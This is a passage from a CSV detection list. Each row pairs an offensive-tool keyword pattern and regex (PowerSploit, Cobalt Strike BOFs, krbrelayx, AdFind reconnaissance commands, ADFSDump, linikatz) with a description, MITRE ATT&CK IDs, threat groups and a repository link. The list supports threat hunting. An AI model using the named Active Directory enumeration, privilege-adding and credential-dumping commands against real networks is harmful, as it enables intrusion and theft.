T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Add-ServiceDacl *",".{0,1000}Add\-ServiceDacl\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Add-ServiceDacl*",".{0,1000}Add\-ServiceDacl.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*addspn.py -u * -p * -t * -s * --additional *",".{0,1000}addspn\.py\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-t\s.{0,1000}\s\-s\s.{0,1000}\s\-\-additional\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*addspn.py*",".{0,1000}addspn\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*AddUser-Bof.c*",".{0,1000}AddUser\-Bof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.git*",".{0,1000}AddUser\-Bof\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.o*",".{0,1000}AddUser\-Bof\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.x64*",".{0,1000}AddUser\-Bof\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.x86*",".{0,1000}AddUser\-Bof\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUserImplant*",".{0,1000}AddUserImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*AddUserToDomainGroup *Domain Admins*",".{0,1000}AddUserToDomainGroup\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","0","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*AddUserToDomainGroup.*",".{0,1000}AddUserToDomainGroup\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*AddUserToDomainGroup.cna*",".{0,1000}AddUserToDomainGroup\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*adeeb0a359ee487e9a32bed145a31b5f230153bce48040bc00b2478853e0377a*",".{0,1000}adeeb0a359ee487e9a32bed145a31b5f230153bce48040bc00b2478853e0377a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ADeleg.exe -*",".{0,1000}ADeleg\.exe\s\-.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*ADeleg_InsecureResourceDelegationReport_*",".{0,1000}ADeleg_InsecureResourceDelegationReport_.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*ADeleg_InsecureTrusteeDelegationReport_*",".{0,1000}ADeleg_InsecureTrusteeDelegationReport_.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*adexplorer.go*",".{0,1000}adexplorer\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*ADExplorerSnapshot.py*",".{0,1000}ADExplorerSnapshot\.py.{0,1000}","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","8","774","99","2024-02-25T16:37:56Z","2021-12-22T14:42:23Z" "*ADExplorerSnapshot.py.git*",".{0,1000}ADExplorerSnapshot\.py\.git.{0,1000}","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","8","774","99","2024-02-25T16:37:56Z","2021-12-22T14:42:23Z" "*adf6d464ce449914110607706da329993186f52f99074af1b7b1734a46dd4fcf*",".{0,1000}adf6d464ce449914110607706da329993186f52f99074af1b7b1734a46dd4fcf.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*adfind -gcb -sc trustdmp*",".{0,1000}adfind\s\-gcb\s\-sc\strustdmp.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc adinfo*",".{0,1000}adfind\s\-sc\sadinfo.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc computers_pwdnotreqd*",".{0,1000}adfind\s\-sc\scomputers_pwdnotreqd.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc dclist*",".{0,1000}adfind\s\-sc\sdclist.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc dcmodes*",".{0,1000}adfind\s\-sc\sdcmodes.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc domainlist*",".{0,1000}adfind\s\-sc\sdomainlist.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -sc trustdmp*",".{0,1000}adfind\s\-sc\strustdmp.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind -subnets*",".{0,1000}adfind\s\-subnets.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","10","3","298","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*adfind.exe -f (objectcategory=organizationalUnit) > *.txt*",".{0,1000}adfind\.exe\s\-f\s\(objectcategory\=organizationalUnit\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*adfind.exe -f (objectcategory=person) > *.txt*",".{0,1000}adfind\.exe\s\-f\s\(objectcategory\=person\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*adfind.exe -f *(objectcategory=group)* > *.txt*",".{0,1000}adfind\.exe\s\-f\s.{0,1000}\(objectcategory\=group\).{0,1000}\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*adfind.exe -f objectcategory=computer > *.txt*",".{0,1000}adfind\.exe\s\-f\sobjectcategory\=computer\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*adfind.exe -gcb -sc trustdmp > *.txt*",".{0,1000}adfind\.exe\s\-gcb\s\-sc\strustdmp\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*AdFind.exe -sc getacls -sddlfilter *computer* -recmute*",".{0,1000}AdFind\.exe\s\-sc\sgetacls\s\-sddlfilter\s\s\s.{0,1000}computer.{0,1000}\s\s\-recmute.{0,1000}","offensive_tool_keyword","POC","command used in the method prerequisites of the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*adfind.exe -subnets -f (objectCategory=subnet) > *.txt*",".{0,1000}adfind\.exe\s\-subnets\s\-f\s\(objectCategory\=subnet\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ADFSDump.csproj*",".{0,1000}ADFSDump\.csproj.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - 